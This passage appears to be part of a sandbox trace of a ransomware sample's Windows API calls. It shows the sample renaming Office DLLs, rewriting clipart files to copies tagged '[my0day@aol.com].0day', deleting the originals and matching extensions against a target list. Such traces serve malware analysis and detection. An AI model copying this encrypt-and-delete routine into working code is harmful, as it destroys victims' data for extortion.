shared\\office14\\mso.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mso.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0266.331] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSORES.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msores.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0267.819] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\PRJRES.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\prjres.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0267.819] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\RICHED20.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\riched20.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0267.827] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0267.828] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPOBJS.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0267.829] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppsvc.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.205] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.218] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.223] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0268.240] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0269.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0269.629] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.629] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0269.784] GetLastError () returned 0x0 [0269.784] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1cd8, lpOverlapped=0x0) returned 1 [0269.819] WriteFile (in: hFile=0x394, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1ce0, lpOverlapped=0x0) returned 1 [0269.974] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.974] WriteFile (in: hFile=0x394, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xea, lpOverlapped=0x0) returned 1 [0269.974] SetEndOfFile (hFile=0x394) returned 1 [0270.030] CloseHandle (hObject=0x394) returned 1 [0270.062] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.062] SetEndOfFile (hFile=0x318) returned 1 [0270.581] CloseHandle (hObject=0x318) returned 1 [0270.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.605] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid")) returned 1 [0270.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.633] lstrlenW (lpString=".doc") returned 4 [0270.633] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.633] lstrlenW (lpString=".docx") returned 5 [0270.633] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.634] lstrlenW (lpString=".pdf") returned 4 [0270.634] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.634] lstrlenW (lpString=".xls") returned 4 [0270.634] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.634] lstrlenW (lpString=".xlsx") returned 5 [0270.634] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.634] lstrlenW (lpString=".ppt") returned 4 [0270.634] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.634] lstrlenW (lpString=".zip") returned 4 [0270.634] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.634] lstrlenW (lpString=".rar") returned 4 [0270.634] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.634] lstrlenW (lpString=".bz2") returned 4 [0270.634] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.635] lstrlenW (lpString=".7z") returned 3 [0270.635] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.635] lstrlenW (lpString=".dbf") returned 4 [0270.635] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.635] lstrlenW (lpString=".1cd") returned 4 [0270.635] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.635] lstrlenW (lpString=".jpg") returned 4 [0270.635] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.635] lstrlenW (lpString=".doc") returned 4 [0270.635] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.635] lstrlenW (lpString=".docx") returned 5 [0270.635] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.635] lstrlenW (lpString=".pdf") returned 4 [0270.635] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.635] lstrlenW (lpString=".xls") returned 4 [0270.635] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.635] lstrlenW (lpString=".xlsx") returned 5 [0270.635] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.635] lstrlenW (lpString=".ppt") returned 4 [0270.635] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.635] lstrlenW (lpString=".zip") returned 4 [0270.635] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.635] lstrlenW (lpString=".rar") returned 4 [0270.635] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.635] lstrlenW (lpString=".bz2") returned 4 [0270.635] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.635] lstrlenW (lpString=".7z") returned 3 [0270.636] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.636] lstrlenW (lpString=".dbf") returned 4 [0270.636] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.636] lstrlenW (lpString=".1cd") returned 4 [0270.636] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0270.636] lstrlenW (lpString=".jpg") returned 4 [0270.636] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.636] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.636] lstrlenW (lpString="JNGLE_01.MID") returned 12 [0270.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0270.636] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=5843) returned 1 [0270.636] CloseHandle (hObject=0x318) returned 1 [0270.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid")) returned 0x20 [0270.636] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0270.637] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.637] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0270.637] GetLastError () returned 0x0 [0270.637] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x16d3, lpOverlapped=0x0) returned 1 [0270.669] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x16e0, lpOverlapped=0x0) returned 1 [0270.670] ReadFile (in: hFile=0x318, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.670] WriteFile (in: hFile=0x390, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.670] SetEndOfFile (hFile=0x390) returned 1 [0270.671] CloseHandle (hObject=0x390) returned 1 [0270.671] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.671] SetEndOfFile (hFile=0x318) returned 1 [0270.673] CloseHandle (hObject=0x318) returned 1 [0270.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.673] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid")) returned 1 [0270.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.674] lstrlenW (lpString=".doc") returned 4 [0270.674] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.674] lstrlenW (lpString=".docx") returned 5 [0270.674] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.674] lstrlenW (lpString=".pdf") returned 4 [0270.674] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.674] lstrlenW (lpString=".xls") returned 4 [0270.674] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.674] lstrlenW (lpString=".xlsx") returned 5 [0270.674] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.674] lstrlenW (lpString=".ppt") returned 4 [0270.674] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.674] lstrlenW (lpString=".zip") returned 4 [0270.675] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.675] lstrlenW (lpString=".rar") returned 4 [0270.675] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.675] lstrlenW (lpString=".bz2") returned 4 [0270.675] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.675] lstrlenW (lpString=".7z") returned 3 [0270.675] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.675] lstrlenW (lpString=".dbf") returned 4 [0270.675] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.675] lstrlenW (lpString=".1cd") returned 4 [0270.675] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.675] lstrlenW (lpString=".jpg") returned 4 [0270.675] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.675] lstrlenW (lpString=".doc") returned 4 [0270.675] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0270.675] lstrlenW (lpString=".docx") returned 5 [0270.675] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0270.675] lstrlenW (lpString=".pdf") returned 4 [0270.675] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0270.675] lstrlenW (lpString=".xls") returned 4 [0270.675] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0270.675] lstrlenW (lpString=".xlsx") returned 5 [0270.675] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0270.675] lstrlenW (lpString=".ppt") returned 4 [0270.675] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0270.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.675] lstrlenW (lpString=".zip") returned 4 [0270.675] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0270.676] lstrlenW (lpString=".rar") returned 4 [0270.676] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0270.676] lstrlenW (lpString=".bz2") returned 4 [0270.676] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0270.676] lstrlenW (lpString=".7z") returned 3 [0270.676] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0270.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.676] lstrlenW (lpString=".dbf") returned 4 [0270.676] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0270.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.676] lstrlenW (lpString=".1cd") returned 4 [0270.676] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID") returned 63 [0270.676] lstrlenW (lpString=".jpg") returned 4 [0270.676] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.676] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.676] lstrlenW (lpString="NBOOK_01.MID") returned 12 [0270.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.700] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=5968) returned 1 [0270.700] CloseHandle (hObject=0x384) returned 1 [0270.700] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid")) returned 0x20 [0270.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0270.975] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.975] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.071] GetLastError () returned 0x0 [0271.071] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x1750, lpOverlapped=0x0) returned 1 [0271.079] WriteFile (in: hFile=0x38c, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x1760, lpOverlapped=0x0) returned 1 [0271.080] ReadFile (in: hFile=0x388, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.080] WriteFile (in: hFile=0x38c, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.080] SetEndOfFile (hFile=0x38c) returned 1 [0271.080] CloseHandle (hObject=0x38c) returned 1 [0271.080] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.080] SetEndOfFile (hFile=0x388) returned 1 [0271.083] CloseHandle (hObject=0x388) returned 1 [0271.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.151] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\nbook_01.mid")) returned 1 [0271.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.152] lstrlenW (lpString=".doc") returned 4 [0271.152] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.152] lstrlenW (lpString=".docx") returned 5 [0271.152] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.152] lstrlenW (lpString=".pdf") returned 4 [0271.152] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.152] lstrlenW (lpString=".xls") returned 4 [0271.152] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.152] lstrlenW (lpString=".xlsx") returned 5 [0271.152] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.152] lstrlenW (lpString=".ppt") returned 4 [0271.152] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.152] lstrlenW (lpString=".zip") returned 4 [0271.152] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.152] lstrlenW (lpString=".rar") returned 4 [0271.152] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.152] lstrlenW (lpString=".bz2") returned 4 [0271.152] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.152] lstrlenW (lpString=".7z") returned 3 [0271.152] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NBOOK_01.MID") returned 63 [0271.152] lstrlenW 